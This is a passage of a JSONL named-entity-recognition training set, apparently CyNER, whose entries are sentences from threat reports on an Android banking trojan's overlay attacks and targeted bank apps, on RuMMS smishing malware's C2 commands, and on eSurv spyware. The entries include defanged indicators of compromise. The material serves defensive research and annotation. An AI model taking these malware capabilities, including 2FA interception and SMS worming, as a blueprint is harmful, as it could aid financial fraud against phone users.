"cyner_train"}} {"text": "Aside from the natural value of phone numbers associated with the names of their owners .", "spans": {}, "info": {"id": "cyner_train_001002", "source": "cyner_train"}} {"text": "Using the SMS has an initial infection vector is another possibility for the exfiltration .", "spans": {}, "info": {"id": "cyner_train_001003", "source": "cyner_train"}} {"text": 
"One of the purposes of the exfiltration of the contact list is to use them to attack other victims using SMS as an initial vector .", "spans": {}, "info": {"id": "cyner_train_001004", "source": "cyner_train"}} {"text": "checkApps : Asks the malware to see if the packages sent as parameters are installed .", "spans": {}, "info": {"id": "cyner_train_001005", "source": "cyner_train"}} {"text": "The malware contains a list of 209 packages hardcoded in its source code .", "spans": {}, "info": {"id": "cyner_train_001006", "source": "cyner_train"}} {"text": "List of packages received from the C2 adminNumber : Setup of the admin phone number .", "spans": {}, "info": {"id": "cyner_train_001008", "source": "cyner_train"}} {"text": "In our case , the administrator phone number belongs to a mobile network in Australia .", "spans": {}, "info": {"id": "cyner_train_001009", "source": "cyner_train"}} {"text": "Phone number for administration changeServer : At this point , the malware changes the C2 to a new host , even though the API and communication protocol continues to be the same .", "spans": {}, "info": {"id": "cyner_train_001010", "source": "cyner_train"}} {"text": "Change server request The URL 's for the new server is obfuscated , preventing easy network identification .", "spans": {}, "info": {"id": "cyner_train_001011", "source": "cyner_train"}} {"text": "changeActivity : This command will set up the webview to overlay any of the target activities .", "spans": {}, "info": {"id": "cyner_train_001012", "source": "cyner_train"}} {"text": "params : This command allows the malicious operator to change configuration parameters in the malware .", "spans": {}, "info": {"id": "cyner_train_001014", "source": "cyner_train"}} {"text": "Command to change the beaconing changeArchive : The final command of the activation cycle is the download of an archive .", "spans": {}, "info": {"id": "cyner_train_001016", "source": "cyner_train"}} {"text": "This archive is stored in the same host 
has the webviews .", "spans": {}, "info": {"id": "cyner_train_001017", "source": "cyner_train"}} {"text": "The archive is a ZIP containing several files , which is protected with a password .", "spans": {}, "info": {"id": "cyner_train_001018", "source": "cyner_train"}} {"text": "These activities depend on the device configuration .", "spans": {}, "info": {"id": "cyner_train_001021", "source": "cyner_train"}} {"text": "These are adapted to the information the malicious operator wants to retrieve .", "spans": {}, "info": {"id": "cyner_train_001023", "source": "cyner_train"}} {"text": "The first webview overlay is created on step 6 of the activation cycle .", "spans": {}, "info": {"id": "cyner_train_001024", "source": "cyner_train"}} {"text": "This file contains all HTML , CSS and PNG files necessary to create overlays .", "spans": {}, "info": {"id": "cyner_train_001027", "source": "cyner_train"}} {"text": "Talos found 189 logos from banks to cryptocurrency exchanges inside the archive , all of which could be targeted .", "spans": {}, "info": {"id": "cyner_train_001028", "source": "cyner_train"}} {"text": "The archive also contained all the necessary codes to target Australian financial institutions .", "spans": {}, "info": {"id": "cyner_train_001029", "source": "cyner_train"}} {"text": "The overlays are activated by the malicious operator using the command changeActivity , as seen on step 5 of the activation cycle .", "spans": {}, "info": {"id": "cyner_train_001030", "source": "cyner_train"}} {"text": "In this case , we can see that the HTML code of the overlay is stored in the C2 infrastructure .", "spans": {}, "info": {"id": "cyner_train_001031", "source": "cyner_train"}} {"text": "However , since the archive that is downloaded into the device has all the necessary information and the malicious actor has access to the device via SMS , the malicious operator can keep its activity even without the C2 infrastructure .", "spans": {}, "info": {"id": 
"cyner_train_001032", "source": "cyner_train"}} {"text": "Infrastructure The infrastructure supporting this malware is rather complex .", "spans": {}, "info": {"id": "cyner_train_001033", "source": "cyner_train"}} {"text": "It is clear that on all stages there are at least two layers .", "spans": {}, "info": {"id": "cyner_train_001034", "source": "cyner_train"}} {"text": "The infrastructure has several layers , although not being very dynamic , still has several layers each one providing some level of protection .", "spans": {}, "info": {"id": "cyner_train_001035", "source": "cyner_train"}} {"text": "All the IP addresses belong to the same company Hetzner , an IP-hosting firm in Germany .", "spans": {"ORGANIZATION: Hetzner": [[48, 55]]}, "info": {"id": "cyner_train_001036", "source": "cyner_train"}} {"text": "COVERAGE Cisco Cloud Web Security ( CWS ) or Web Security Appliance ( WSA ) web scanning prevents access to malicious websites and detects malware used in these attacks .", "spans": {"ORGANIZATION: Cisco": [[9, 14]], "SYSTEM: Cloud Web Security": [[15, 33]], "SYSTEM: Web Security Appliance": [[45, 67]]}, "info": {"id": "cyner_train_001037", "source": "cyner_train"}} {"text": "Open Source SNORTⓇ Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org .", "spans": {}, "info": {"id": "cyner_train_001042", "source": "cyner_train"}} {"text": "INDICATORS OF COMPROMISE ( IOCS ) Domains Facebook-photos-au.su Homevideo2-12l.ml videohosting1-5j.gq URLs hxxp : //88.99.227 [ .", "spans": {}, "info": {"id": "cyner_train_001043", "source": "cyner_train"}} {"text": "] 26/html2/2018/GrafKey/new-inj-135-3-dark.html hxxp : //88.99.227 [ .", "spans": {}, "info": {"id": "cyner_train_001044", "source": "cyner_train"}} {"text": "] 26/html2/arc92/au483x.zip hxxp : //94.130.106 [ .", "spans": {}, "info": {"id": "cyner_train_001045", "source": "cyner_train"}} {"text": "] 117:8080/api/v1/report/records.php hxxp : 
//88.99.227 [ .", "spans": {}, "info": {"id": "cyner_train_001046", "source": "cyner_train"}} {"text": "] 26/html2/new-inj-135-3-white.html hxxp : //facebook-photos-au [ .", "spans": {}, "info": {"id": "cyner_train_001047", "source": "cyner_train"}} {"text": "] ml/mms3/download_3.php IP addresses 78.46.201.36 88.99.170.84 88.99.227.26 94.130.106.117 88.99.174.200 88.99.189.31 Hash 369fcf48c1eb982088c22f86672add10cae967af82613bee6fb8a3669603dc48 b2d4fcf03c7a8bf135fbd3073bea450e2e6661ad8ef2ab2058a3c04f81fc3f3e", "spans": {}, "info": {"id": "cyner_train_001049", "source": "cyner_train"}} {"text": "8f5d5d8419a4832d175a6028c9e7d445f1e99fdc12170db257df79831c69ae4e a5ebcdaf5fd10ec9de85d62e48cc97a4e08c699a7ebdeab0351b86ab1370557d 84578b9b2c3cc1c7bbfcf4038a6c76ae91dfc82eef5e4c6815627eaf6b4ae6f6", "spans": {}, "info": {"id": "cyner_train_001050", "source": "cyner_train"}} {"text": "89eecd91dff4bf42bebbf3aa85aa512ddf661d3e9de4c91196c98f4fc325a018 9edee3f3d539e3ade61ac2956a6900d93ba3b535b6a76b3a9ee81e2251e25c61 0e48e5dbc3a60910c1460b382d28e087a580f38f57d3f82d4564309346069bd1 c113cdd2a5e164dcba157fc4e6026495a1cfbcb0b1a8bf3e38e7eddbb316e01f", "spans": {}, "info": {"id": "cyner_train_001051", "source": "cyner_train"}} {"text": "1819d2546d9c9580193827c0d2f5aad7e7f2856f7d5e6d40fd739b6cecdb1e9e b213c1de737b72f8dd7185186a246277951b651c64812692da0b9fdf1be5bf15 453e7827e943cdda9121948f3f4a68d6289d09777538f92389ca56f6e6de03f0 0246dd4acd9f64ff1508131c57a7b29e995e102c74477d5624e1271700ecb0e2", "spans": {}, "info": {"id": "cyner_train_001052", "source": "cyner_train"}} {"text": "88034e0eddfdb6297670d28ed810aef87679e9492e9b3e782cc14d9d1a55db84 e08f08f4fa75609731c6dd597dc55c8f95dbdd5725a6a90a9f80134832a07f2e 01c5b637f283697350ca361f241416303ab6123da4c6726a6555ac36cb654b5c 1fb06666befd581019af509951320c7e8535e5b38ad058069f4979e9a21c7e1c", "spans": {}, "info": {"id": "cyner_train_001053", "source": "cyner_train"}} {"text": "6bdfb79f813448b7f1b4f4dbe6a45d1938f3039c93ecf80318cedd1090f7e341 
ADDITIONAL INFORMATION Packages monitored pin.secret.access com.chase.sig.android com.morganstanley.clientmobile.prod com.wf.wellsfargomobile com.citi.citimobile com.konylabs.capitalone com.infonow.bofa com.htsu.hsbcpersonalbanking com.usaa.mobile.android.usaa", "spans": {}, "info": {"id": "cyner_train_001054", "source": "cyner_train"}} {"text": "com.schwab.mobile com.americanexpress.android.acctsvcs.us com.pnc.ecommerce.mobile com.regions.mobbanking com.clairmail.fth com.grppl.android.shell.BOS com.tdbank com.huntington.m com.citizensbank.androidapp com.usbank.mobilebanking com.ally.MobileBanking com.key.android com.unionbank.ecommerce.mobile.android com.mfoundry.mb.android.mb_BMOH071025661", "spans": {}, "info": {"id": "cyner_train_001055", "source": "cyner_train"}} {"text": "com.bbt.cmol com.sovereign.santander com.mtb.mbanking.sc.retail.prod com.fi9293.godough com.commbank.netbank org.westpac.bank org.stgeorge.bank au.com.nab.mobile au.com.bankwest.mobile au.com.ingdirect.android org.banksa.bank com.anz.android com.anz.android.gomoney com.citibank.mobile.au org.bom.bank com.latuabancaperandroid", "spans": {}, "info": {"id": "cyner_train_001056", "source": "cyner_train"}} {"text": "com.comarch.mobile com.jpm.sig.android com.konylabs.cbplpat by.belinvestbank no.apps.dnbnor com.arkea.phonegap com.alseda.bpssberbank com.belveb.belvebmobile com.finanteq.finance.ca pl.eurobank pl.eurobank2 pl.noblebank.mobile com.getingroup.mobilebanking hr.asseco.android.mtoken.getin pl.getinleasing.mobile com.icp.ikasa.getinon", "spans": {}, "info": {"id": "cyner_train_001057", "source": "cyner_train"}} {"text": "eu.eleader.mobilebanking.pekao softax.pekao.powerpay softax.pekao.mpos dk.jyskebank.mobilbank com.starfinanz.smob.android.bwmobilbanking eu.newfrontier.iBanking.mobile.SOG.Retail com.accessbank.accessbankapp com.sbi.SBIFreedomPlus com.zenithBank.eazymoney net.cts.android.centralbank com.f1soft.nmbmobilebanking.activities.main com.lb.smartpay com.mbmobile", "spans": {}, 
"info": {"id": "cyner_train_001058", "source": "cyner_train"}} {"text": "com.db.mobilebanking com.botw.mobilebanking com.fg.wallet com.sbi.SBISecure com.icsfs.safwa com.interswitchng.www com.dhanlaxmi.dhansmart.mtc com.icomvision.bsc.tbc hr.asseco.android.jimba.cecro com.vanso.gtbankapp com.fss.pnbpsp com.mfino.sterling cy.com.netinfo.netteller.boc ge.mobility.basisbank com.snapwork.IDBI", "spans": {}, "info": {"id": "cyner_train_001059", "source": "cyner_train"}} {"text": "com.lcode.apgvb com.fact.jib mn.egolomt.bank com.pnbrewardz com.firstbank.firstmobile wit.android.bcpBankingApp.millenniumPL com.grppl.android.shell.halifax com.revolut.revolut de.commerzbanking.mobil uk.co.santander.santanderUK se.nordea.mobilebank com.snapwork.hdfc com.csam.icici.bank.imobile com.msf.kbank.mobile", "spans": {}, "info": {"id": "cyner_train_001060", "source": "cyner_train"}} {"text": "com.bmm.mobilebankingapp net.bnpparibas.mescomptes fr.banquepopulaire.cyberplus com.caisseepargne.android.mobilebanking com.palatine.android.mobilebanking.prod com.ocito.cdn.activity.creditdunord com.fullsix.android.labanquepostale.accountaccess mobi.societegenerale.mobile.lappli com.db.businessline.cardapp com.skh.android.mbanking com.ifs.banking.fiid1491", "spans": {}, "info": {"id": "cyner_train_001061", "source": "cyner_train"}} {"text": "de.dkb.portalapp pl.pkobp.ipkobiznes pl.com.suntech.mobileconnect eu.eleader.mobilebanking.pekao.firm pl.mbank pl.upaid.nfcwallet.mbank eu.eleader.mobilebanking.bre pl.asseco.mpromak.android.app.bre pl.asseco.mpromak.android.app.bre.hd pl.mbank.mnews eu.eleader.mobilebanking.raiffeisen pl.raiffeisen.nfc hr.asseco.android.jimba.rmb", "spans": {}, "info": {"id": "cyner_train_001062", "source": "cyner_train"}} {"text": "com.advantage.RaiffeisenBank pl.bzwbk.ibiznes24 pl.bzwbk.bzwbk24 pl.bzwbk.mobile.tab.bzwbk24 com.comarch.mobile.investment com.android.vending com.snapchat.android jp.naver.line.android com.viber.voip com.gettaxi.android com.whatsapp 
com.tencent.mm com.skype.raider com.ubercab com.paypal.android.p2pmobile", "spans": {}, "info": {"id": "cyner_train_001063", "source": "cyner_train"}} {"text": "com.circle.android com.coinbase.android com.walmart.android com.bestbuy.android com.ebay.gumtree.au com.ebay.mobile com.westernunion.android.mtapp com.moneybookers.skrillpayments com.gyft.android com.amazon.mShop.android.shopping com.comarch.mobile.banking.bgzbnpparibas.biznes pl.bnpbgzparibas.firmapp com.finanteq.finance.bgz pl.upaid.bgzbnpp", "spans": {}, "info": {"id": "cyner_train_001064", "source": "cyner_train"}} {"text": "de.postbank.finanzassistent pl.bph de.comdirect.android com.starfinanz.smob.android.sfinanzstatus de.sdvrz.ihb.mobile.app pl.ing.mojeing com.ing.mobile pl.ing.ingksiegowosc com.comarch.security.mobilebanking com.comarch.mobile.investment.ing com.ingcb.mobile.cbportal de.buhl.finanzblick pl.pkobp.iko pl.ipko.mobile pl.inteligo.mobile de.number26.android", "spans": {}, "info": {"id": "cyner_train_001065", "source": "cyner_train"}} {"text": "pl.millennium.corpApp eu.transfer24.app pl.aliorbank.aib pl.corelogic.mtoken alior.bankingapp.android com.ferratumbank.mobilebank com.swmind.vcc.android.bzwbk_mobile.app de.schildbach.wallet piuk.blockchain.android com.bitcoin.mwallet com.btcontract.wallet com.bitpay.wallet com.bitpay.copay btc.org.freewallet.app org.electrum.electrum", "spans": {}, "info": {"id": "cyner_train_001066", "source": "cyner_train"}} {"text": "com.xapo com.airbitz com.kibou.bitcoin com.qcan.mobile.bitcoin.wallet me.cryptopay.android com.bitcoin.wallet lt.spectrofinance.spectrocoin.android.wallet com.kryptokit.jaxx com.wirex bcn.org.freewallet.app com.hashengineering.bitcoincash.wallet bcc.org.freewallet.app com.coinspace.app btg.org.freewallet.app net.bither", "spans": {}, "info": {"id": "cyner_train_001067", "source": "cyner_train"}} {"text": "co.edgesecure.app com.arcbit.arcbit distributedlab.wallet de.schildbach.wallet_test com.aegiswallet com.plutus.wallet 
com.coincorner.app.crypt eth.org.freewallet.app secret.access secret.pattern RuMMS : The Latest Family of Android Malware Attacking Users in Russia Via SMS Phishing April 26 , 2016 Introduction Recently we observed an Android malware family being used to attack users in Russia .", "spans": {"MALWARE: RuMMS": [[195, 200]], "SYSTEM: Android": [[224, 231]], "MALWARE: Android": [[336, 343]]}, "info": {"id": "cyner_train_001068", "source": "cyner_train"}} {"text": "The malware samples were mainly distributed through a series of malicious subdomains registered under a legitimate domain belonging to a well-known shared hosting service provider in Russia .", "spans": {}, "info": {"id": "cyner_train_001069", "source": "cyner_train"}} {"text": "Because all the URLs used in this campaign have the form of hxxp : //yyyyyyyy [ .", "spans": {}, "info": {"id": "cyner_train_001070", "source": "cyner_train"}} {"text": "] XXXX.ru/mms.apk ( where XXXX.ru represents the hosting provider ’ s domain ) , we named this malware family RuMMS .", "spans": {"MALWARE: RuMMS": [[110, 115]]}, "info": {"id": "cyner_train_001071", "source": "cyner_train"}} {"text": "To lure the victims to download the malware , threat actors use SMS phishing – sending a short SMS message containing a malicious URL to the potential victims .", "spans": {}, "info": {"id": "cyner_train_001072", "source": "cyner_train"}} {"text": "Unwary users who click the seemingly innocuous link will have their device infected with RuMMS malware .", "spans": {"MALWARE: RuMMS": [[89, 94]]}, "info": {"id": "cyner_train_001073", "source": "cyner_train"}} {"text": "Figure 1 describes this infection process and the main behaviors of RuMMS .", "spans": {"MALWARE: RuMMS": [[68, 73]]}, "info": {"id": "cyner_train_001074", "source": "cyner_train"}} {"text": "On April 3 , 2016 , we still observed new RuMMS samples emerging in the wild .", "spans": {"MALWARE: RuMMS": [[42, 47]]}, "info": {"id": "cyner_train_001075", "source": "cyner_train"}} 
{"text": "Within this time period , we identified close to 300 samples belonging to this family ( all sample hashes are listed in the Appendix ) .", "spans": {}, "info": {"id": "cyner_train_001077", "source": "cyner_train"}} {"text": "After landing on the victim ’ s phone , the RuMMS apps will request device administrator privileges , remove their icons to hide themselves from users , and remain running in the background to perform a series of malicious behaviors .", "spans": {"MALWARE: RuMMS": [[44, 49]]}, "info": {"id": "cyner_train_001078", "source": "cyner_train"}} {"text": "So far we have identified the following behaviors : Sending device information to a remote command and control ( C2 ) server .", "spans": {}, "info": {"id": "cyner_train_001079", "source": "cyner_train"}} {"text": "Contacting the C2 server for instructions .", "spans": {}, "info": {"id": "cyner_train_001080", "source": "cyner_train"}} {"text": "Sending SMS messages to financial institutions to query account balances .", "spans": {}, "info": {"id": "cyner_train_001081", "source": "cyner_train"}} {"text": "Uploading any incoming SMS messages ( including the balance inquiry results ) to the remote C2 server .", "spans": {}, "info": {"id": "cyner_train_001082", "source": "cyner_train"}} {"text": "Each of these behaviors is under the control of the remote C2 server .", "spans": {}, "info": {"id": "cyner_train_001085", "source": "cyner_train"}} {"text": "In other words , the C2 server can specify the message contents to be sent , the time period in which to forward the voice call , and the recipients of outgoing messages .", "spans": {}, "info": {"id": "cyner_train_001086", "source": "cyner_train"}} {"text": "As part of our investigation into this malware , we emulated an infected Android device in order to communicate with the RuMMS C2 server .", "spans": {"SYSTEM: Android": [[73, 80]], "MALWARE: RuMMS": [[121, 126]]}, "info": {"id": "cyner_train_001087", "source": "cyner_train"}} {"text": 
"During one session , the C2 server commanded our emulated device to send four different SMS messages to four different phone numbers , all of which were associated with Russian financial institutions .", "spans": {}, "info": {"id": "cyner_train_001088", "source": "cyner_train"}} {"text": "At least three of the messages were intended to check a user ’ s account balance at the institution ( we could not confirm the purpose of the fourth ) .Through additional research , we identified several forum posts where victims complained of funds ( up to 600 rubles ) were transferred out of their accounts after RuMMS infected their phones .", "spans": {"MALWARE: RuMMS": [[316, 321]]}, "info": {"id": "cyner_train_001089", "source": "cyner_train"}} {"text": "We do not know exactly how many people have been infected with RuMMS malware .", "spans": {"MALWARE: RuMMS": [[63, 68]]}, "info": {"id": "cyner_train_001090", "source": "cyner_train"}} {"text": "However , our data suggests that there have been at least 2,729 infections between January 2016 and early April 2016 , with a peak in March of more than 1,100 infections .", "spans": {}, "info": {"id": "cyner_train_001091", "source": "cyner_train"}} {"text": "Smishing ( SMS phishing ) is currently the primary way threat actors are distributing the malware .", "spans": {}, "info": {"id": "cyner_train_001093", "source": "cyner_train"}} {"text": "An example SMS message is shown in Figure 1 .", "spans": {}, "info": {"id": "cyner_train_001095", "source": "cyner_train"}} {"text": "All of the URLs reference the file “ mms.apk ” and all use the domain “ XXXX.ru ” , which belongs to a top five shared hosting platform in Russia ( the domain itself has been obfuscated to anonymize the provider ) .", "spans": {}, "info": {"id": "cyner_train_001097", "source": "cyner_train"}} {"text": "The threat actors registered at least seven subdomains through the hosting provider , each consisting of eight random-looking characters ( asdfgjcr , cacama18 , 
cacamadf , konkonq2 , mmsmtsh5 , riveroer , and sdfkjhl2 .", "spans": {}, "info": {"id": "cyner_train_001098", "source": "cyner_train"}} {"text": ") As of this writing , no files were hosted at any of the links .", "spans": {}, "info": {"id": "cyner_train_001099", "source": "cyner_train"}} {"text": "Use of a shared hosting service to distribute malware is highly flexible and low cost for the threat actors .", "spans": {}, "info": {"id": "cyner_train_001101", "source": "cyner_train"}} {"text": "It is also much harder for network defenders or researchers to track a campaign where the infrastructure is a moving target .", "spans": {}, "info": {"id": "cyner_train_001102", "source": "cyner_train"}} {"text": "Many top providers in Russia offer cheap prices for their shared hosting services , and some even provide free 30-day trial periods .", "spans": {}, "info": {"id": "cyner_train_001103", "source": "cyner_train"}} {"text": "Threat actors can register subdomains through the hosting provider and use the provider ’ s services for a short-period campaign .", "spans": {}, "info": {"id": "cyner_train_001104", "source": "cyner_train"}} {"text": "In addition , these out-of-the-box hosting services usually provide better infrastructure than the attackers could manage to construct ( or compromise ) themselves .", "spans": {}, "info": {"id": "cyner_train_001106", "source": "cyner_train"}} {"text": "RuMMS Code Analysis All RuMMS samples share the same behaviors , major parts of which are shown in Figure 1 .", "spans": {"MALWARE: RuMMS": [[0, 5], [24, 29]]}, "info": {"id": "cyner_train_001107", "source": "cyner_train"}} {"text": "We used a sample app named “ org.starsizew ” with an MD5 of d8caad151e07025fdbf5f3c26e3ceaff to analyze RuMMS ’ s code .", "spans": {"MALWARE: RuMMS": [[104, 109]]}, "info": {"id": "cyner_train_001109", "source": "cyner_train"}} {"text": "Several of the main components of RuMMS are shown in Figure 2 .", "spans": {"MALWARE: RuMMS": [[34, 39]]}, "info": 
{"id": "cyner_train_001110", "source": "cyner_train"}} {"text": "The activity class “ org.starsizew.MainActivity ” executes when the app is started .", "spans": {}, "info": {"id": "cyner_train_001111", "source": "cyner_train"}} {"text": "It first starts another activity defined in “ org.starsizew.Aa ” to request device administrator privileges , and then calls the following API of “ android.content.pm.PackageManager ” ( the Android package manager to remove its own icon on the home screen in order to conceal the existence of RuMMS from the user : At the same time , ” org.starsizew.MainActivity ” will start the main service as defined in “ org.starsizew.Tb ” , and use a few mechanisms to keep the main service running continuously", "spans": {"SYSTEM: Android": [[190, 197]], "MALWARE: RuMMS": [[293, 298]]}, "info": {"id": "cyner_train_001112", "source": "cyner_train"}} {"text": "The class “ org.starsizew.Tb ” also has a self-monitoring mechanism to restart itself when its own onDestroy API is triggered .", "spans": {}, "info": {"id": "cyner_train_001115", "source": "cyner_train"}} {"text": "All those functions are implemented in asynchronous tasks by “ org.starsizew.i ” .", "spans": {}, "info": {"id": "cyner_train_001117", "source": "cyner_train"}} {"text": "Its major functionality is also implemented through the call of the asynchronous task ( “ org.starsizew.i ” ) , including uploading the incoming SMS messages to the remote C2 server and executing any commands as instructed by the remote attacker .", "spans": {}, "info": {"id": "cyner_train_001119", "source": "cyner_train"}} {"text": "C2 Communication The C2 communication includes two parts : sending information to the remote HTTP server and parsing the server ’ s response to execute any commands as instructed by the remote attackers .", "spans": {}, "info": {"id": "cyner_train_001120", "source": "cyner_train"}} {"text": "Method doInBackground : to send information to remote C2 server As seen from the major code 
body of method doInBackground shown in Figure 3 ( some of the original classes and methods are renamed for easier understanding ) , there are three calls to HttpPost with different contents as parameters .", "spans": {}, "info": {"id": "cyner_train_001123", "source": "cyner_train"}} {"text": "At line 5 , local variable v4 specifies the first parameter url , which can be changed by the remote C2 server later .", "spans": {}, "info": {"id": "cyner_train_001124", "source": "cyner_train"}} {"text": "These URLs are all in the form of “ http : // $ C2. $ SERVER. $ IP/api/ ?", "spans": {}, "info": {"id": "cyner_train_001125", "source": "cyner_train"}} {"text": "The second parameter is a constant string “ POST ” , and the third parameter is a series of key-value pairs to be sent , assembled at runtime .", "spans": {}, "info": {"id": "cyner_train_001127", "source": "cyner_train"}} {"text": "It only has two parts , the method indicated by word “ info ” and the victim identifier .", "spans": {}, "info": {"id": "cyner_train_001130", "source": "cyner_train"}} {"text": "sms_send : to send C2-specified SMS messages to C2-specified recipients .", "spans": {}, "info": {"id": "cyner_train_001134", "source": "cyner_train"}} {"text": "sms_grab : to upload periodically the SMS messages in the inbox to C2 server .", "spans": {}, "info": {"id": "cyner_train_001135", "source": "cyner_train"}} {"text": "delivery : to deliver specified text to all victim ’ s contacts ( SMS worming ) .", "spans": {}, "info": {"id": "cyner_train_001136", "source": "cyner_train"}} {"text": "call_number : to forward phone calls to intercept voice based two-factor authentication .", "spans": {}, "info": {"id": "cyner_train_001137", "source": "cyner_train"}} {"text": "new_url : to change the URL of the C2 server in the app preference .", "spans": {}, "info": {"id": "cyner_train_001138", "source": "cyner_train"}} {"text": "ussd : to call a C2-specified phone number .", "spans": {}, "info": {"id": 
"cyner_train_001139", "source": "cyner_train"}} {"text": "Method onPostExecute : to handle instructions from remote C2 Figure 6 shows an example response sent back from one C2 server .", "spans": {}, "info": {"id": "cyner_train_001141", "source": "cyner_train"}} {"text": "Note that inside this single response , there is one “ install_true ” command , one “ sms_grab ” command and four “ sms_send ” commands .", "spans": {}, "info": {"id": "cyner_train_001142", "source": "cyner_train"}} {"text": "With the four “ sms_send ” commands , the messages as specified in the key “ text ” will be sent immediately to the specified short numbers .", "spans": {}, "info": {"id": "cyner_train_001143", "source": "cyner_train"}} {"text": "Example Response in JSON format In particular , short number “ +7494 ” is associated with a payment service provider in Russia .", "spans": {}, "info": {"id": "cyner_train_001146", "source": "cyner_train"}} {"text": "For example , sending text “ Balance ” will trigger a response with the victim ’ s wallet balance .", "spans": {}, "info": {"id": "cyner_train_001148", "source": "cyner_train"}} {"text": "Sending text “ confirm 1 ” will include proof of payment .", "spans": {}, "info": {"id": "cyner_train_001149", "source": "cyner_train"}} {"text": "Sending text “ call on ” will activate the USSD payment confirmation service .", "spans": {}, "info": {"id": "cyner_train_001150", "source": "cyner_train"}} {"text": "During our investigation , we observed the C2 server sending multiple “ balance ” commands to different institutions , presumably to query the victim ’ s financial account balances .", "spans": {}, "info": {"id": "cyner_train_001151", "source": "cyner_train"}} {"text": "These could include resetting the user ’ s PIN , enabling or disabling various alerts and confirmations , and confirming the user ’ s identity .", "spans": {}, "info": {"id": "cyner_train_001153", "source": "cyner_train"}} {"text": "Figure 7 lists the IP addresses of these C2 
servers , the number of RuMMS apps that connect to each of them , and the example URL used as the first parameter of the HttpPost operation ( used in the code of Figure 3 ) .", "spans": {"MALWARE: RuMMS": [[68, 73]]}, "info": {"id": "cyner_train_001155", "source": "cyner_train"}} {"text": "This indicates that multiple C2 servers were used in this campaign , but one ( 37.1.207.31 ) was the most heavily used .", "spans": {}, "info": {"id": "cyner_train_001156", "source": "cyner_train"}} {"text": "In the quadrant , the smaller boxes in blue-gray represent particular apps in the RuMMS family , while the bigger boxes in deep-blue represent C2 servers used by some RuMMS apps .", "spans": {"MALWARE: RuMMS": [[82, 87], [167, 172]]}, "info": {"id": "cyner_train_001159", "source": "cyner_train"}} {"text": "In this figure we have 11 RuMMS samples , all of which were hosted on the website as shown in the “ y ” axis .", "spans": {"MALWARE: RuMMS": [[26, 31]]}, "info": {"id": "cyner_train_001161", "source": "cyner_train"}} {"text": "The dates on the “ x ” axis show the dates when we first saw these apps in the wild .", "spans": {}, "info": {"id": "cyner_train_001162", "source": "cyner_train"}} {"text": "Threat actors used different websites to host different payloads at different times .", "spans": {}, "info": {"id": "cyner_train_001164", "source": "cyner_train"}} {"text": "This kind of “ moving target ” behavior made it harder to track their actions .", "spans": {}, "info": {"id": "cyner_train_001165", "source": "cyner_train"}} {"text": "C2 servers are shared by multiple samples .", "spans": {}, "info": {"id": "cyner_train_001167", "source": "cyner_train"}} {"text": "RuMMS samples , hosting sites , C2 servers from Jan. 
2016 to Mar .", "spans": {"MALWARE: RuMMS": [[0, 5]]}, "info": {"id": "cyner_train_001170", "source": "cyner_train"}} {"text": "Figure 9 shows the number of RuMMS infections recorded in the last four months .", "spans": {"MALWARE: RuMMS": [[29, 34]]}, "info": {"id": "cyner_train_001172", "source": "cyner_train"}} {"text": "In February , we recorded 767 infections .", "spans": {}, "info": {"id": "cyner_train_001174", "source": "cyner_train"}} {"text": "In March , it peaked at 1,169 infections .", "spans": {}, "info": {"id": "cyner_train_001175", "source": "cyner_train"}} {"text": "In April , at the time of writing this post , we recorded 413 RuMMS infections .", "spans": {"MALWARE: RuMMS": [[62, 67]]}, "info": {"id": "cyner_train_001176", "source": "cyner_train"}} {"text": "Although the propagation trend seems to be slowing down a bit , the figure tells us that RuMMS malware is still alive in the wild .", "spans": {"MALWARE: RuMMS": [[89, 94]]}, "info": {"id": "cyner_train_001177", "source": "cyner_train"}} {"text": "We continue to monitor its progress .", "spans": {}, "info": {"id": "cyner_train_001178", "source": "cyner_train"}} {"text": "The recent RuMMS campaign shows that Smishing is still a popular means for threat actors to distribute their malware .", "spans": {"MALWARE: RuMMS": [[11, 16]]}, "info": {"id": "cyner_train_001180", "source": "cyner_train"}} {"text": "In addition , the use of shared-hosting providers adds flexibility to the threat actor ’ s campaign and makes it harder for defending parties to track these moving targets .", "spans": {}, "info": {"id": "cyner_train_001181", "source": "cyner_train"}} {"text": "Fortunately , FireEye Mobile Threat Prevention platform can recognize the malicious SMS and networking behaviors used by these RuMMS samples , and help us quickly identify the threat .", "spans": {"SYSTEM: FireEye Mobile Threat Prevention": [[14, 46]], "MALWARE: RuMMS": [[127, 132]]}, "info": {"id": "cyner_train_001182", "source": 
"cyner_train"}} {"text": "All of the victims are located in Italy .", "spans": {}, "info": {"id": "cyner_train_001190", "source": "cyner_train"}} {"text": "All of these Google Play Store pages have been taken down by Google .", "spans": {"SYSTEM: Google Play Store": [[13, 30]], "ORGANIZATION: Google": [[61, 67]]}, "info": {"id": "cyner_train_001191", "source": "cyner_train"}} {"text": "We believe this spyware platform is developed by an Italian company called eSurv , which primarily operates in the business of video surveillance .", "spans": {"ORGANIZATION: eSurv": [[75, 80]]}, "info": {"id": "cyner_train_001192", "source": "cyner_train"}} {"text": "According to public records it appears that eSurv began to also develop intrusion software in 2016 .", "spans": {"ORGANIZATION: eSurv": [[44, 49]]}, "info": {"id": "cyner_train_001193", "source": "cyner_train"}} {"text": "Worryingly , some of the modifications enforced by the spyware might expose the infected devices to further compromise or data tampering .", "spans": {}, "info": {"id": "cyner_train_001195", "source": "cyner_train"}} {"text": "Disguised Spyware Uploaded on Google Play Store We identified previously unknown spyware apps being successfully uploaded on Google Play Store multiple times over the course of over two years .", "spans": {"SYSTEM: Google Play Store": [[30, 47], [125, 142]]}, "info": {"id": "cyner_train_001196", "source": "cyner_train"}} {"text": "While details would vary , all of the identified copies of this spyware shared a similar disguise .", "spans": {}, "info": {"id": "cyner_train_001198", "source": "cyner_train"}} {"text": "Often the app description on the Play Store would reference some SMS messages the targets would supposedly receive leading them to the Play Store page .", "spans": {"SYSTEM: Play Store": [[33, 43], [135, 145]]}, "info": {"id": "cyner_train_001200", "source": "cyner_train"}} {"text": "All of the Play Store pages we identified and all of the decoys of the apps themselves 
